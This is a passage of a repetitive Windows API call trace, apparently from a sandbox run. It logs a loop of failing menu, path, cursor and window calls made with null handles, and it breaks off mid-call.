GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.602] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.602] GetStockObject (i=6) returned 0x1b00018 [0100.602] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.602] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.602] PathFileExistsW (pszPath=0x0) returned 0 [0100.602] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.602] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.602] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.602] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.602] GetMenu (hWnd=0x0) returned 0x0 [0100.602] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x22c) returned -1 [0100.602] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.603] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.603] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.603] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.603] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.603] GetStockObject (i=6) returned 0x1b00018 [0100.603] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.603] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.603] PathFileExistsW (pszPath=0x0) returned 0 [0100.603] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.603] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.603] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.603] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.603] GetMenu (hWnd=0x0) returned 0x0 [0100.603] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.603] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.603] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.603] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.603] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.603] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.603] GetStockObject (i=6) returned 0x1b00018 [0100.603] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.603] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.603] PathFileExistsW (pszPath=0x0) returned 0 [0100.603] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.603] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.603] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.603] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.603] GetMenu (hWnd=0x0) returned 0x0 [0100.603] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x342) returned -1 [0100.603] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.603] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.603] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.603] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.603] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.603] GetStockObject (i=6) returned 0x1b00018 [0100.603] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.604] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.604] PathFileExistsW (pszPath=0x0) returned 0 [0100.604] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.604] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.604] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.604] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.604] GetMenu (hWnd=0x0) returned 0x0 [0100.604] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.604] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.604] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.604] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.604] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.604] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.604] GetStockObject (i=6) returned 0x1b00018 [0100.604] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.604] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.604] PathFileExistsW (pszPath=0x0) returned 0 [0100.604] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.604] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.604] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.604] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.604] GetMenu (hWnd=0x0) returned 0x0 [0100.604] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x347) returned -1 [0100.604] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.604] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.604] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.604] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.604] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.604] GetStockObject (i=6) returned 0x1b00018 [0100.604] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.604] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.604] PathFileExistsW (pszPath=0x0) returned 0 [0100.604] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.604] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.604] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.604] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.604] GetMenu (hWnd=0x0) returned 0x0 [0100.605] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x28f) returned -1 [0100.605] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.605] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.605] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.605] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.605] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.605] GetStockObject (i=6) returned 0x1b00018 [0100.605] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.605] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.605] PathFileExistsW (pszPath=0x0) returned 0 [0100.605] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.605] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.605] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.605] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.605] GetMenu (hWnd=0x0) returned 0x0 [0100.605] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.605] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.605] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.605] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.605] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.605] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.605] GetStockObject (i=6) returned 0x1b00018 [0100.605] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.605] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.605] PathFileExistsW (pszPath=0x0) returned 0 [0100.605] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.605] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.605] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.605] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.605] GetMenu (hWnd=0x0) returned 0x0 [0100.605] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x343) returned -1 [0100.605] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.605] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.605] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.605] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.605] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.606] GetStockObject (i=6) returned 0x1b00018 [0100.606] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.606] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.606] PathFileExistsW (pszPath=0x0) returned 0 [0100.606] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.606] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.606] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.606] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.606] GetMenu (hWnd=0x0) returned 0x0 [0100.606] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.606] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.606] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.606] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.606] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.606] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.606] GetStockObject (i=6) returned 0x1b00018 [0100.606] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.606] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.606] PathFileExistsW (pszPath=0x0) returned 0 [0100.606] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.606] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.606] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.606] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.606] GetMenu (hWnd=0x0) returned 0x0 [0100.606] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x343) returned -1 [0100.606] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.606] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.606] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.606] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.606] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.606] GetStockObject (i=6) returned 0x1b00018 [0100.606] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.606] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.606] PathFileExistsW (pszPath=0x0) returned 0 [0100.606] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.606] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.607] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.607] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.607] GetMenu (hWnd=0x0) returned 0x0 [0100.607] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x234) returned -1 [0100.607] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.607] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.607] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.607] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.607] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.607] GetStockObject (i=6) returned 0x1b00018 [0100.607] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.607] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.607] PathFileExistsW (pszPath=0x0) returned 0 [0100.607] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.607] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.607] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.607] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.607] GetMenu (hWnd=0x0) returned 0x0 [0100.607] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.607] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.607] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.607] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.607] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.607] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.607] GetStockObject (i=6) returned 0x1b00018 [0100.607] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.607] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.607] PathFileExistsW (pszPath=0x0) returned 0 [0100.607] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.607] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.607] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.607] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.607] GetMenu (hWnd=0x0) returned 0x0 [0100.607] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x342) returned -1 [0100.607] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.607] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.608] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.608] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.608] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.608] GetStockObject (i=6) returned 0x1b00018 [0100.608] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.608] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.608] PathFileExistsW (pszPath=0x0) returned 0 [0100.608] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.608] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.608] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.608] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.608] GetMenu (hWnd=0x0) returned 0x0 [0100.608] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.608] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.608] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.608] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.608] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.608] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.608] GetStockObject (i=6) returned 0x1b00018 [0100.608] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.608] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.608] PathFileExistsW (pszPath=0x0) returned 0 [0100.608] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.608] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.608] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.608] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.608] GetMenu (hWnd=0x0) returned 0x0 [0100.608] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.608] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.608] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.608] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.608] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.608] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.608] GetStockObject (i=6) returned 0x1b00018 [0100.608] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.608] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.609] PathFileExistsW (pszPath=0x0) returned 0 [0100.609] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.609] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.609] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.609] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.609] GetMenu (hWnd=0x0) returned 0x0 [0100.609] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x140) returned -1 [0100.609] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.609] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.609] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.609] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.609] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.609] GetStockObject (i=6) returned 0x1b00018 [0100.609] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.609] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.609] PathFileExistsW (pszPath=0x0) returned 0 [0100.609] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.609] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.609] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.609] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.609] GetMenu (hWnd=0x0) returned 0x0 [0100.609] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.609] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.609] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.609] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.609] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.609] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.609] GetStockObject (i=6) returned 0x1b00018 [0100.609] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.609] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.609] PathFileExistsW (pszPath=0x0) returned 0 [0100.609] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.609] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.609] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.609] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.609] GetMenu (hWnd=0x0) returned 0x0 [0100.610] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x342) returned -1 [0100.610] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.610] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.610] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.610] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.610] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.610] GetStockObject (i=6) returned 0x1b00018 [0100.610] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.610] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.610] PathFileExistsW (pszPath=0x0) returned 0 [0100.610] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.610] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.610] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.610] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.610] GetMenu (hWnd=0x0) returned 0x0 [0100.610] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.610] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.610] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.610] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.610] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.610] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.610] GetStockObject (i=6) returned 0x1b00018 [0100.610] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.610] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.610] PathFileExistsW (pszPath=0x0) returned 0 [0100.610] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.610] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.610] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.610] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.610] GetMenu (hWnd=0x0) returned 0x0 [0100.610] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, 